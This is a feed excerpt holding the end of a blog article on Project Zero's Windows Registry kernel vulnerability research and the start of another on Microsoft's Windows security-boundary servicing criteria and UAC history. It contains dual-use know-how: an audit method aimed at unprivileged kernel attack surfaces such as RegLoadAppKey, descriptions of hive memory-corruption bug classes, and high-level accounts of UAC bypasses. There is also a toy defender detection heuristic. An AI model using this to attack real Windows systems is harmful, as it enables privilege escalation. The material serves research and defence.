The Jurczyk pattern is reproducible. Pick a closed-source Windows kernel subsystem with a structurally rigid input format. Get the public PDB symbols for `ntoskrnl.exe` (or the relevant driver). Find the equivalent of `RegLoadAppKey` for the surface in question -- the unprivileged user-mode entry point that runs the most kernel code on the most attacker-influenced input. Then read every reachable function. The unglamorous methodology and the long-form Project Zero blog series are the same artifact.Jurczyk&apos;s 2022 registry-specific coverage-guided Bochs harness has never been publicly released. The lineage -- Bochspwn (2013), Bochspwn Reloaded (2018) -- is well-documented in Jurczyk&apos;s public papers and repositories [@bochspwn-reloaded-paper; @bochspwn-reloaded-repo]. The registry-specific configuration is not.
&lt;h3&gt;For defenders&lt;/h3&gt;
&lt;p&gt;The detection story for hive-memory-corruption attempts is unusual. Most real-world exploitation chains will load an attacker-controlled hive via &lt;code&gt;RegLoadAppKey&lt;/code&gt; (or its close relatives &lt;code&gt;RegLoadKey&lt;/code&gt;, &lt;code&gt;RegLoadKeyEx&lt;/code&gt;, &lt;code&gt;RegRestoreKey&lt;/code&gt;) from an unusual path -- typically a temporary directory under the calling user&apos;s profile or an SMB share. The hive file itself can be analyzed offline by mounting it with a forensic parser such as libregf [@libregf-repo] or Suhanov&apos;s regf tools [@msuhanov-repo].&lt;/p&gt;
&lt;p&gt;The kernel exposes the operation via the &lt;code&gt;Microsoft-Windows-Kernel-Registry&lt;/code&gt; &lt;a href=&quot;https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/&quot; rel=&quot;noopener&quot;&gt;ETW&lt;/a&gt; provider, and &lt;a href=&quot;https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/&quot; rel=&quot;noopener&quot;&gt;Sysmon&lt;/a&gt; surfaces registry operations under event IDs 12 (key create/delete), 13 (value set), and 14 (key/value rename) [@ms-sysmon]. A simple detection heuristic is &quot;Medium-IL process performs an unusual rate of hive-load operations on attacker-shaped paths.&quot; Detection logic looks like the following.&lt;/p&gt;
&lt;p&gt;{`
// Toy detection: Medium-IL process loads multiple app hives from
// non-standard paths within a short window. Inspired by Sysmon event IDs
// 12 (registry create/delete) and 13 (registry value set).&lt;/p&gt;
&lt;p&gt;function suspiciousHiveLoad(event, profileWindowMs) {
  const isLoad = event.operation === &apos;CreateKey&apos; || event.operation === &apos;LoadAppKey&apos;;
  if (!isLoad) return false;&lt;/p&gt;
&lt;p&gt;  const path = event.targetPath || &apos;&apos;;
  const fromTempOrShare =
    path.match(/AppData\\Local\\Temp/i) ||
    path.match(/^\\\\[^\\]+\\/) ||
    path.match(/Users\\Public/i);&lt;/p&gt;
&lt;p&gt;  const lowIntegrity = event.integrityLabel === &apos;Medium&apos; || event.integrityLabel === &apos;Low&apos;;&lt;/p&gt;
&lt;p&gt;  const recentCount = countRecentEventsFromPid(event.pid, profileWindowMs);
  const burst = recentCount &amp;gt; 5;&lt;/p&gt;
&lt;p&gt;  return lowIntegrity &amp;amp;&amp;amp; fromTempOrShare &amp;amp;&amp;amp; burst;
}&lt;/p&gt;
&lt;p&gt;function alert(event) {
  if (suspiciousHiveLoad(event, 60000)) {
    console.log(&apos;ALERT: anomalous hive load from PID &apos; + event.pid +
                &apos; path=&apos; + event.targetPath);
  }
}
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The 17 CVEs in Jurczyk&apos;s PZ #8 cohort all share the same exploitation primitive. If you are triaging a backlog of Windows security updates, prioritize fixes for these CVE IDs over the broader 50-CVE list: CVE-2022-34707, -34708, -37956, -37988, -38037; CVE-2023-21675, -21748, -23420, -23421, -23422, -23423, -28248, -35382, -38139; CVE-2024-26182, -43641, -49114 [@pz8-registry-adventure-8].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;For engineers maintaining adjacent code&lt;/h3&gt;
&lt;p&gt;PZ #4, #5, and #6 collectively are the most accessible non-Microsoft technical reference on the Configuration Manager [@pz4-registry-adventure-4; @pz5-registry-adventure-5; @pz6-registry-adventure-6]. If you are doing security review of a subsystem that interacts with the registry -- ETW, KTM, AppX state, group policy -- those three posts plus PZ #7 give you the model of the in-kernel data structures you are talking to.&lt;/p&gt;
&lt;h3&gt;For everyone else&lt;/h3&gt;
&lt;p&gt;The 50 CVE IDs spanning CVE-2022-34707 through CVE-2024-49114 are a checklist for &quot;have these been rolled across our fleet?&quot; [@pz1-registry-adventure-1]. The 17-CVE hive-memory-corruption subset is the priority order [@pz8-registry-adventure-8]. The fixes are in Microsoft&apos;s monthly servicing channel; there are no out-of-band patches required, but the cohort is large enough that a fleet that fell behind on Patch Tuesday in 2022 -- 2024 may have several of these still outstanding.&lt;/p&gt;
&lt;p&gt;The research is published. The detection is uncomplicated. The next twenty months of Windows kernel research will not be about the registry, which makes the question this article ends on -- what about everything else nobody has read -- the only question left.&lt;/p&gt;
&lt;h2&gt;11. FAQ&lt;/h2&gt;
&lt;p&gt;A handful of questions worth correcting before they propagate. These are the misconceptions inherited from secondary summaries of the research, including the prompt for this article.&lt;/p&gt;

No. **Bochspwn Reloaded** is a separate 2017--2018 Project Zero tool, also by Jurczyk, that detects uninitialized kernel memory disclosures via x86 taint tracking [@bochspwn-reloaded-repo; @bochspwn-reloaded-paper]. The 2022--2023 registry research is **The Windows Registry Adventure**, an eight-part Project Zero blog series [@pz1-registry-adventure-1]. The 2022 coverage-guided Bochs harness Jurczyk briefly used on the registry was a separate, unreleased tool sharing the same general lineage, but it is not the public Bochspwn Reloaded repository. Conflating the two is the most common third-party error about this research.

No. At a minimum, Jurczyk and Forshaw fuzzed it in 2016 -- the bug reports filed as Project Zero issues #873, #874, #876, and #993 are the surviving artifacts of that effort [@pz1-registry-adventure-1] -- and Jurczyk built a coverage-guided Bochs harness against it in early 2022 that produced CVE-2022-35768 within days. The 2022--2023 work that produced 50 CVEs was a manual code audit, not a fuzzing campaign. The &quot;fuzzed precisely once&quot; claim mixes up &quot;no published fuzzing campaign at scale&quot; with &quot;no one ever pointed a fuzzer at this,&quot; and the latter is just not true.

No. The Configuration Manager uses **pushlocks** (shared and exclusive modes) on a per-Key-Control-Block basis, plus a hive-wide pushlock for global hive operations [@pz6-registry-adventure-6]. &quot;Lock-free&quot; is a misconception that appears in some secondary summaries -- including the prompt for this article. The actual design is fine-grained pushlock-synchronized, and several of Jurczyk&apos;s temporal hive-memory-corruption bugs exploit the moment a pushlock is released and re-acquired.

All of those are correct at different points in the publication arc. PZ #1 (April 2024) counts 44 from the 90-day cohort plus 6 from the March 2024 low-severity batch = 50 [@pz1-registry-adventure-1]. PZ #5 (December 2024) reports 52 [@pz5-registry-adventure-5]. PZ #7 (May 2025) reports 53 [@pz7-registry-adventure-7]. The growth reflects Microsoft assigning more CVE IDs to Jurczyk&apos;s existing bug reports over time, not new discoveries. &quot;50+&quot; is the safe shorthand; &quot;50 in the original cohort, 53 by mid-2025&quot; is the precise version.

**OffensiveCon 2024**, in Berlin. The talk was &quot;Practical Exploitation of Registry Vulnerabilities in the Windows Kernel&quot;; slides and recording are public [@offcon24-jurczyk-speaker; @offcon24-slides; @offcon24-video]. The earlier **BlueHat Redmond 2023** talk (titled &quot;Exploring the Windows Registry as a powerful LPE attack surface&quot;) was the first public disclosure of the research [@bluehat23-slides; @bluehat23-video]. &quot;OffensiveCon 2025&quot; is wrong; that talk has not happened.

No. Microsoft has never published a regf specification; PZ #5 states this directly: &quot;Throughout the 30 years of the format&apos;s existence, Microsoft has never released its official specification&quot; [@pz5-registry-adventure-5]. Unofficially, two community-maintained specs cover almost all of it: Joachim Metz&apos;s libregf, updated continuously since July 2009 [@libregf-spec], and Maxim Suhanov&apos;s regf project [@msuhanov-spec]. The Microsoft-blessed reference book is *Windows Internals, Part 2, 7th Edition* by Allievi, Russinovich, Ionescu, and Solomon [@winint7-part2]. Everything else is forensics-community reverse engineering.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-registry-adventure&quot; keyTerms={[
  { term: &quot;regf&quot;, definition: &quot;Microsoft&apos;s binary registry file format, introduced in NT 3.1 (1993) and frozen at v1.3 in NT 4.0 (1996). The on-disk format and the in-memory format are the same format.&quot; },
  { term: &quot;Hive&quot;, definition: &quot;A file-and-in-memory tree of registry keys and values, encoded in regf and parsed by the Windows kernel&apos;s Configuration Manager.&quot; },
  { term: &quot;Cell&quot;, definition: &quot;The unit of allocation inside a hive: length-prefixed bytes whose signed prefix marks free (positive) or allocated (negative), with size in multiples of eight bytes.&quot; },
  { term: &quot;Cell map&quot;, definition: &quot;A page-table-like indirection layer that translates a 32-bit cell index into a kernel virtual address.&quot; },
  { term: &quot;RegLoadAppKey&quot;, definition: &quot;Win32 API since Vista that lets an unprivileged process load an arbitrary hive file. The kernel parser runs on attacker-supplied bytes.&quot; },
  { term: &quot;Hive-based memory corruption&quot;, definition: &quot;Jurczyk&apos;s bug class: spatial (cell-boundary overflows) and temporal (cell-reuse use-after-frees) memory corruption via the deterministic cell allocator.&quot; },
  { term: &quot;Pushlock&quot;, definition: &quot;Windows kernel synchronization primitive (shared/exclusive). The registry uses per-KCB and hive-wide pushlocks; it is not lock-free.&quot; },
  { term: &quot;Double-fetch&quot;, definition: &quot;Pattern where the kernel reads the same attacker-influenced memory twice; section-backed hives since Windows 10 RS4 made this exploitable on hive files from SMB shares.&quot; },
  { term: &quot;Bochspwn Reloaded&quot;, definition: &quot;A 2018 Project Zero tool for detecting kernel infoleaks via Bochs-based taint tracking. NOT the registry-research instrument.&quot; },
  { term: &quot;LangSec&quot;, definition: &quot;Language-theoretic security: parsers as recognizers for a formal grammar. The regf parser is not a LangSec recognizer by design.&quot; }
]} questions={[
  { q: &quot;Why does the Windows kernel run a binary parser on attacker-supplied bytes at Medium IL?&quot;, a: &quot;&lt;code&gt;RegLoadAppKey&lt;/code&gt;, introduced in Vista (2006), explicitly allows an unprivileged process to load an arbitrary hive file as a private app hive. The kernel-mode regf parser runs on those bytes; only the resulting handle is sandboxed.&quot; },
  { q: &quot;Why was bitflipping fuzzing ineffective against regf?&quot;, a: &quot;The base-block validator rejects most random mutations before the parser proper sees them; the interesting bugs are semantic, requiring legal hive images that exercise multi-feature combinations (transactions, virtualization, log replay).&quot; },
  { q: &quot;Why is the cell allocator unrandomized?&quot;, a: &quot;Recovery semantics require deterministic cell placement after log replay; cells encode their indices in the on-disk format. Randomization would break crash recovery.&quot; },
  { q: &quot;Distinguish spatial from temporal hive-memory-corruption violations.&quot;, a: &quot;Spatial: a write crosses a cell boundary into an adjacent cell. Temporal: a write uses a cell-index reference whose backing storage has been freed and reallocated to attacker-influenced content.&quot; },
  { q: &quot;Why is the section-backed hive design in Windows 10 RS4 a double-fetch enabler?&quot;, a: &quot;Hive pages became pageable. The kernel can read a hive byte at validation time and again at use time, and the underlying page can be re-fetched in between -- especially over SMB. CVE-2024-43452 is the canonical example.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;The eight Project Zero posts run roughly 120,000 words across April 2024 -- May 2025. Microsoft has serviced 53 CVEs from them so far. The registry&apos;s parser remains substantively the same routine it has been since Windows NT 4.0. There is no public roadmap for a redesign. The question that follows -- what is the expected yield of similar audits of every other Windows kernel subsystem that no one has read end-to-end -- is the one a research community could answer in another twenty months, if it chose to.&lt;/p&gt;
</content:encoded><category>windows-kernel</category><category>security-research</category><category>fuzzing</category><category>manual-audit</category><category>project-zero</category><category>registry</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Windows Security Boundaries: The Document That Decides What Gets a CVE</title><link>https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/</link><guid isPermaLink="true">https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/</guid><description>Microsoft maintains a single public document that decides which Windows vulnerability reports receive a CVE, a Patch Tuesday bulletin, and a bounty payout. Here is how to read it.</description><pubDate>Sun, 24 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Microsoft maintains a single public document that decides which Windows vulnerability reports receive a CVE, a Patch Tuesday bulletin, and a bounty payout, and which receive &quot;by design.&quot;** The *Security Servicing Criteria for Windows* enumerates nine security **boundaries** (network, process, kernel, session, user, AppContainer, virtual machine, Virtual Trust Level, and as of 2025, the Administrator Protection elevation path) and seven security **features** (UAC, Microsoft Defender, HVCI, Driver Signing, Protected Process Light, admin-to-kernel privilege escalation, same-user post-authentication). A two-question triage rule generates every MSRC disposition, including every &quot;by design -- UAC is not a security boundary&quot; reply you have ever read. Reading the doctrine is the difference between filing a useful MSRC report and getting back one polite sentence.
&lt;h2&gt;1. A UAC Bypass Walks Into MSRC&lt;/h2&gt;
&lt;p&gt;Three weeks of reverse engineering. A clean video of &lt;code&gt;consent.exe&lt;/code&gt; being skipped via a registry-hijack technique. A report filed through &lt;code&gt;msrc.microsoft.com/report&lt;/code&gt;. Two business days later, the Microsoft Security Response Center replies in one sentence: &lt;em&gt;&quot;Thank you for the report. UAC is not a security boundary; please refer to the Microsoft Security Servicing Criteria for Windows. This issue is by design.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;That sentence has been Microsoft&apos;s consistent position since June 2007 [@russinovich-vista-uac-wayback]. It is the operational anchor of every Windows vulnerability disposition made in the last nineteen years, and it routes through a single public document most researchers have never read.&lt;/p&gt;
&lt;p&gt;The document is called the &lt;em&gt;Microsoft Security Servicing Criteria for Windows&lt;/em&gt; [@msrc-criteria]. Twenty-eight paragraphs and two enumerated tables live on a single MSRC web page. Those paragraphs decide which Windows findings get a CVE number, which get a Patch Tuesday bulletin, which get a bounty payout, and which get a polite &quot;by design&quot; reply that closes the ticket without a fix. Every other operational artifact in Microsoft&apos;s security response -- the bounty schedule, the monthly bulletin calendar, the per-finding severity ratings -- is downstream of this one taxonomy.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &quot;by design&quot; reply is not boilerplate. Every MSRC triage engineer who issues it is applying a specific clause of a specific document. The reply means: we read your finding, mapped it against our published classification, and the primitive you attacked is on our security-feature list rather than our security-boundary list. We may still harden the feature in a future build, but we are not going to assign a CVE or ship a Patch Tuesday bulletin for it. The classification is published. The disposition follows from the classification.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The researcher&apos;s first reaction is the natural one. Three weeks of work. A working bypass. A Microsoft binary skipped. And the reply is &lt;em&gt;one sentence&lt;/em&gt;?&lt;/p&gt;
&lt;p&gt;It is right, and the rest of this article is the explanation of why. We will walk the document&apos;s history from a single June 2007 TechNet article through the November 2024 Administrator Protection announcement, decode the two-question triage rule that generates every MSRC disposition, take each of the nine boundaries and each of the seven features in turn, and finish with a checklist for filing a report that does not come back &quot;by design.&quot;&lt;/p&gt;
&lt;p&gt;To understand why the reply was operationally correct, not a cop-out, we have to walk the document&apos;s history back to its origin: a single article published in &lt;em&gt;TechNet Magazine&lt;/em&gt; in June 2007, by an author Microsoft had named a Technical Fellow just five months before.&lt;/p&gt;
&lt;h2&gt;2. The Pre-Doctrine Era&lt;/h2&gt;
&lt;p&gt;For the first fourteen years of Windows NT, there was no servicing-criteria document. There did not need to be.&lt;/p&gt;
&lt;p&gt;Windows NT 3.1 (July 1993) shipped with the architectural pieces every later boundary entry would rest on: the user-mode/kernel-mode privilege split enforced by the CPU&apos;s ring transitions, securable kernel objects mediated by the reference monitor&apos;s &lt;code&gt;SeAccessCheck&lt;/code&gt; primitive, the Security Account Manager (SAM) database with per-user Security Identifiers (SIDs), discretionary access control lists, and access tokens that travelled with every thread [@openlib-custer-nt]. The kernel boundary -- user-mode code MUST NOT execute kernel code without a syscall transition -- and the user boundary -- one user&apos;s process MUST NOT read another user&apos;s data without permission -- were born here as primitives, two decades before either would be enumerated in a vendor-disclosure document.&lt;/p&gt;
&lt;p&gt;But the architecture was not a doctrine. The boundaries sat &lt;em&gt;implicitly&lt;/em&gt; inside Helen Custer&apos;s &lt;em&gt;Inside Windows NT&lt;/em&gt; (Microsoft Press, 1992) and a handful of internal MSDN reference monographs. A researcher reporting a finding in 1998 could not look up &quot;is this a boundary?&quot; anywhere they were authorised to read.&lt;/p&gt;

A *security boundary* provides a logical separation between the code and data of security domains with different levels of trust [@msrc-criteria]. The defining requirement is that security policy dictates what can pass through the boundary -- a guarantee, not a hint. A *security feature*, by contrast, raises the difficulty of attack but carries no vendor commitment that the separation will hold. This distinction, articulated by Mark Russinovich in 2007, is the load-bearing taxonomy of the entire MSRC triage process.
&lt;p&gt;Three failures accumulated pressure during the implicit-boundary era.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Power Users group.&lt;/strong&gt; Microsoft documented the &lt;code&gt;Power Users&lt;/code&gt; group on Windows 2000 and XP as a &quot;less-privileged-than-administrator&quot; middle tier. Microsoft Knowledge Base article KB 825069 eventually conceded that members could obtain administrator rights through multiple privilege paths (the article has since been retired).The Power Users group survived through Windows Server 2003 and was finally dropped from the default Windows Vista install. The lesson stuck: a tier presented as a separation without a policy-enforced guarantee is not a separation at all. The Russinovich convenience-vs-boundary distinction inherits the lesson. A tier presented operationally as a boundary that turned out never to have been one.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The wormable RCE class of 2001-2003.&lt;/strong&gt; Code Red (July 2001) and the RPC DCOM Blaster worm (August 2003) compromised millions of internet-connected Windows hosts [@caida-code-red], [@cert-vu-568148]. Microsoft shipped MS03-026 with Critical severity for the Blaster RPC interface vulnerability [@ms-bulletin-ms03-026]. Operationally, the events made one thing legible: there was no place in the kernel architecture you could point at and say &quot;this is the network boundary that held.&quot; There was a buffer overflow, an unauthenticated RPC call, and a worm.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The 2002 Shatter class.&lt;/strong&gt; In August 2002, a researcher posting under the handle &quot;Foon&quot; (Chris Paget) disclosed to NTBugtraq that any process on the interactive desktop could drive any other process&apos;s windows via Win32 messages [@helpnetsecurity-shatter-2002]. That included &lt;code&gt;SYSTEM&lt;/code&gt;-level services with windows on the same desktop, turning every interactive service into a local privilege-escalation surface. Brett Moore generalised the class the following year in &lt;em&gt;Shattering By Example&lt;/em&gt;, walking message types like &lt;code&gt;WM_SETTEXT&lt;/code&gt;, &lt;code&gt;SB_SETTEXT&lt;/code&gt;, and &lt;code&gt;SB_GETTEXTLENGTH&lt;/code&gt; and turning a one-off bug into a systematic primitive [@exploit-db-21691]. Microsoft&apos;s initial response framed the problem as architectural-by-design rather than as a vulnerability. The community could not predict that response, because the boundary was nowhere written down.&lt;/p&gt;

timeline
    title Pre-doctrine era (NT 3.1 to Vista RTM)
    1993 : Windows NT 3.1 ships with SeAccessCheck and per-user SIDs
    1995 : Windows NT 3.51 and the SAM database stabilise
    1996 : Windows NT 4.0 ships with the Power Users group
    2000 : Windows 2000 introduces Active Directory
    2001 : Code Red worm compromises IIS hosts at internet scale
    2002 : Chris Paget discloses Shatter via NTBugtraq
    2002 : Bill Gates Trustworthy Computing memo reorders Microsoft priorities
    2003 : Brett Moore generalises Shatter in Shattering By Example
    2003 : RPC DCOM Blaster worm and MS03-026
    2006 : Russinovich joins Microsoft via Winternals acquisition
    2006 : Windows Vista RTM ships with UAC, MIC, UIPI, and Session 0 isolation
    2007 : Russinovich promoted to Technical Fellow
&lt;p&gt;The combined pressure forced Bill Gates&apos;s January 15, 2002 &lt;em&gt;Trustworthy Computing&lt;/em&gt; memo -- &lt;em&gt;&quot;Trustworthy Computing is the highest priority for all the work we are doing&quot;&lt;/em&gt; [@wired-twc-memo]. The memo did not itself contain a boundary taxonomy. It reorganised engineering priorities so that one could be written.&lt;/p&gt;
&lt;p&gt;By the November 2006 Vista launch, the mechanisms were in the box. Windows Vista shipped with User Account Control, the linked-token split, Mandatory Integrity Control, the User Interface Privilege Isolation (UIPI) shield, and Session 0 isolation [@ms-news-vista-launch]. By June 2007, those mechanisms had names. The document the next two decades of Windows vulnerability disclosure would route through was about to be written -- not by an MSRC document committee, but by a single Technical Fellow Microsoft had promoted to the title five months earlier.&lt;/p&gt;
&lt;h2&gt;3. Russinovich, June 2007, and the Birth of the Distinction&lt;/h2&gt;
&lt;p&gt;In the June 2007 issue of &lt;em&gt;TechNet Magazine&lt;/em&gt;, Mark Russinovich -- promoted to Technical Fellow that January, after joining Microsoft via the July 2006 Winternals acquisition -- published a single article that would dictate the disposition of every Windows vulnerability filed for the next nineteen years. The article was &lt;em&gt;Inside Windows Vista User Account Control&lt;/em&gt; [@russinovich-vista-uac-wayback]. Its load-bearing section, &lt;em&gt;Elevations and Security Boundaries&lt;/em&gt;, ran two paragraphs.&lt;/p&gt;

It&apos;s important to be aware that UAC elevations are conveniences and not security boundaries. A security boundary requires that security policy dictates what can pass through the boundary. User accounts are an example of a security boundary in Windows because one user can&apos;t access the data belonging to another user without having that user&apos;s permission. -- Mark Russinovich, *Inside Windows Vista User Account Control*, TechNet Magazine, June 2007
&lt;p&gt;The article was first published on TechNet on May 23, 2007 and ran in the June issue of the magazine [@russinovich-vista-uac-announce]. That sentence is the doctrinal origin point. Three architectural ideas appear in it: boundaries exist, they are different from features, and UAC sits on the feature side.&lt;/p&gt;
&lt;p&gt;Russinovich then walked the structural reason. The Vista UAC split-token model shares a great deal between the standard-user token and the elevated-administrator token [@russinovich-vista-uac-wayback]: the same SID, the same &lt;code&gt;%USERPROFILE%&lt;/code&gt; directory, the same &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt; registry hive, the same logon session, and the same DOS device object directory. Those shared resources are the reason the elevation path cannot be a &lt;em&gt;guaranteed&lt;/em&gt; separation. An attacker running at standard integrity on the same desktop can interact with the elevated process&apos;s window station, its named objects, and its user-writable files. The convenience is real -- prompting before a privileged operation is a high-friction barrier against accidental elevation. The guarantee is not.&lt;/p&gt;

flowchart TD
    User[Interactive user logs on]
    User --&amp;gt; Linked[Linked-token logon]
    Linked --&amp;gt; Standard[Standard-user token]
    Linked --&amp;gt; Elevated[Elevated administrator token]
    subgraph Shared[Shared resources between the two tokens]
        SID[Same user SID]
        Profile[Same USERPROFILE]
        HKCU[Same HKCU hive]
        Session[Same logon session]
        Desktop[Same interactive desktop]
    end
    Standard -.-&amp;gt; Shared
    Elevated -.-&amp;gt; Shared
    Shared --&amp;gt; Verdict[No guaranteed separation = feature, not boundary]
&lt;p&gt;The article identifies the &lt;em&gt;real&lt;/em&gt; boundaries Windows enforces -- the user boundary (cross-user access requires explicit permission), the kernel boundary (the syscall gate), and the process boundary (one process cannot read another&apos;s memory without &lt;code&gt;PROCESS_VM_READ&lt;/code&gt; access) -- as the lines policy &lt;em&gt;does&lt;/em&gt; enforce. UAC sits among the features that make those boundaries cheaper to defend, not among the boundaries themselves.&lt;/p&gt;

The widely-circulated press narrative is that Microsoft *initially* called UAC a security boundary and *retracted* that classification in 2009 after the Zheng and Rivera research. This framing is false. Russinovich&apos;s June 2007 article already said verbatim that UAC elevations are &quot;conveniences and not security boundaries.&quot; The position was on the record from Vista&apos;s first six months, two years before any 2009 Windows 7 beta disclosure. What Microsoft changed in 2009 was *implementation* -- the UAC slider began running at High integrity, UAC-settings changes began prompting -- not the classification. The Russinovich Windows 7 follow-up restated the original position word for word [@ms-learn-russinovich-win7].
&lt;p&gt;The historical record matters because so much downstream doctrine rests on it. In late January 2009, Long Zheng and Rafael Rivera demonstrated a Windows 7 beta UAC auto-elevation flaw via &lt;code&gt;rundll32.exe&lt;/code&gt;: Microsoft-signed binaries inside &lt;code&gt;%SystemRoot%&lt;/code&gt; auto-elevated when invoked from a process holding the user&apos;s administrator token, and &lt;code&gt;rundll32.exe&lt;/code&gt; accepted arbitrary DLL paths [@crn-uac-flaw-2009].The original &lt;code&gt;istartedsomething.com&lt;/code&gt; post and the Ars Technica contemporary coverage have since been reorganised away by both sites; the CRN contemporary report (cited here) preserves the disclosure timeline, the &lt;code&gt;rundll32.exe&lt;/code&gt; mechanism, and the Microsoft response. The historical claim is uncontested. What is contested is the framing of Microsoft&apos;s response, which primary sources show was implementation hardening, not a change in classification. Microsoft&apos;s &lt;em&gt;initial&lt;/em&gt; reply (&quot;by design; UAC is not a security boundary&quot;) was operationally consistent with the June 2007 article. The &lt;em&gt;engineering&lt;/em&gt; response that followed -- UAC slider promoted to High integrity, UAC-settings changes prompting -- was implementation hardening, not reclassification. The doctrinal position did not move. Russinovich&apos;s July 2009 follow-up, &lt;em&gt;Inside Windows 7 User Account Control&lt;/em&gt;, restated the convenience-vs-boundary argument with the same architectural reasoning [@ms-learn-russinovich-win7].&lt;/p&gt;
&lt;p&gt;Russinovich&apos;s June 2007 article gave the community three ideas: boundaries exist; they are different from features; UAC sits on the feature side. The next step was to publish the table. That took roughly five years.&lt;/p&gt;
&lt;h2&gt;4. The Document Accumulates&lt;/h2&gt;
&lt;p&gt;Between 2007 and 2026, the boundary table grew by accretion. One new entry per Windows generation. The shape of the doctrine changed three times.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 1 -- scattered prose (2007 to roughly 2010).&lt;/strong&gt; Russinovich&apos;s June 2007 article, plus the July 2009 &lt;em&gt;Inside Windows 7 User Account Control&lt;/em&gt; restatement, articulated the convenience-vs-boundary doctrine without a public enumeration. A reader of the two articles could correctly predict the disposition of a UAC bypass, and could correctly predict that user-to-user data access was a CVE-eligible boundary violation. They could not, from those articles alone, predict the disposition of a network-stack RCE, an AppContainer escape, or a guest-to-host virtual-machine break. The doctrine was consistent but it was not yet a document.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 2 -- the enumerated MSRC page (roughly 2010 to 2015).&lt;/strong&gt; The &lt;code&gt;microsoft.com/en-us/msrc/windows-security-servicing-criteria&lt;/code&gt; page appears in something close to its current form. It states the two-question triage rule. It includes the verbatim definition of a security boundary. It enumerates a list of boundaries -- process, kernel, network, session, user, AppContainer, virtual machine, web browser -- and a parallel list of security features. The doctrine moves from a single magazine article to a vendor commitment with a URL [@msrc-criteria].The first-publication date of the page is folk knowledge. Wayback Machine snapshots survive from 2017 onward at the current URL slug. No Microsoft announcement post pins the exact date the page first appeared, so the &quot;roughly 2010&quot; figure is a community estimate rather than a documented birthday.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 3 -- VTL added (2015 to 2017).&lt;/strong&gt; Windows 10 1507 (RTM July 29, 2015) shipped Virtualization-Based Security, the Secure Kernel, Isolated User Mode (IUM), and the first canonical Trustlet -- LsaIso, the Credential Guard isolated LSA process. The boundary table grew a row whose enforcement primitive is the hypervisor itself: VTL0 (the normal kernel) cannot read or modify VTL1 (the Secure Kernel and IUM) without going through documented hypercalls [@ms-learn-vbs-ci]. The strongest local boundary on the system is now classified, not orphaned.&lt;/p&gt;

A *Trustlet* is a process that runs inside Isolated User Mode (IUM) -- the user-mode portion of VTL1 -- protected by the hypervisor from the normal-kernel VTL0 [@ms-learn-vbs-ci]. The canonical example is LsaIso, the Isolated LSA process that holds the credential material Credential Guard protects. Even a kernel-mode attacker in VTL0 cannot read the memory of a Trustlet running in VTL1; the hypervisor&apos;s second-level address translation tables do not map VTL1 pages into VTL0. Cross-VTL communication routes through Virtual Secure Mode hypercalls (`HvCallVtlCall` and `HvCallVtlReturn`), which are the only documented channel.
&lt;p&gt;&lt;strong&gt;Generation 4 -- stabilised reference (2018 to 2024).&lt;/strong&gt; No new rows. The boundary list is treated as a stable reference that MSRC, researchers, and the community all cite. Three flagship community projects encode the doctrine in their names and structure during this period: hfiref0x&apos;s UACMe (more than 80 catalogued UAC bypasses, none of which receive CVE numbers) [@uacme]; Gabriel Landau&apos;s &lt;em&gt;ItsNotASecurityBoundary&lt;/em&gt; GitHub repository, whose name is an explicit homage to MSRC&apos;s admin-to-kernel policy [@landau-itsnotasb-gh]; and Alon Leviev&apos;s &lt;a href=&quot;https://paragmali.com/blog/windows-downdate-when-the-update-itself-is-the-attack/&quot; rel=&quot;noopener&quot;&gt;Windows Downdate&lt;/a&gt;, presented at Black Hat USA 2024 [@leviev-downdate-orig]. The community-side institutional memory now exists outside MSRC, augmented by Matt Miller&apos;s BlueHat IL keynotes (notably the 2019 &lt;em&gt;Trends, challenges, and shifts in software vulnerability mitigation&lt;/em&gt; talk) that carried the boundary-and-mitigations story to the security-conference audience in parallel with the MSRC page [@miller-bluehat-il-2019].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 5 -- Administrator Protection (2024 to 2026).&lt;/strong&gt; On November 19, 2024, David Weston announced &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Administrator Protection&lt;/a&gt; at Microsoft Ignite, framing it as part of the Windows Resiliency Initiative [@weston-ignite-2024]. The Microsoft Learn page carries the verbatim doctrinal statement: &lt;em&gt;&quot;Administrator protection introduces a new security boundary with support to fix any reported security bugs&quot;&lt;/em&gt; [@ms-learn-admin-protection]. This is the first new boundary entry added to the servicing-criteria table in nearly a decade.&lt;/p&gt;

The *System Managed Administrator Account* is the elevation primitive at the heart of Administrator Protection [@ms-learn-admin-protection]. Each interactive user with administrator privileges has a hidden, system-generated, profile-separated SMAA companion account provisioned in the SAM database. Elevations route through Windows Hello consent and run against the SMAA token, which has a *different* SID, a *different* profile directory, and a *different* logon session from the user&apos;s standard-user token. The token is destroyed when the elevated process ends. The shared-resources structural reason UAC could not be a boundary no longer applies, because the SMAA token does not share those resources with the user&apos;s standard token.

timeline
    title Five generations of the boundary doctrine
    section Generation 1 - Scattered prose (2007 to 2010)
        2007 : Russinovich publishes the convenience-vs-boundary distinction
        2009 : Long Zheng and Rafael Rivera force UAC implementation hardening
        2009 : Russinovich Windows 7 follow-up restates the doctrine
    section Generation 2 - Enumerated page (2010 to 2015)
        2010 : MSRC servicing-criteria page goes live with two-question rule
        2014 : hfiref0x publishes UACMe v1.0
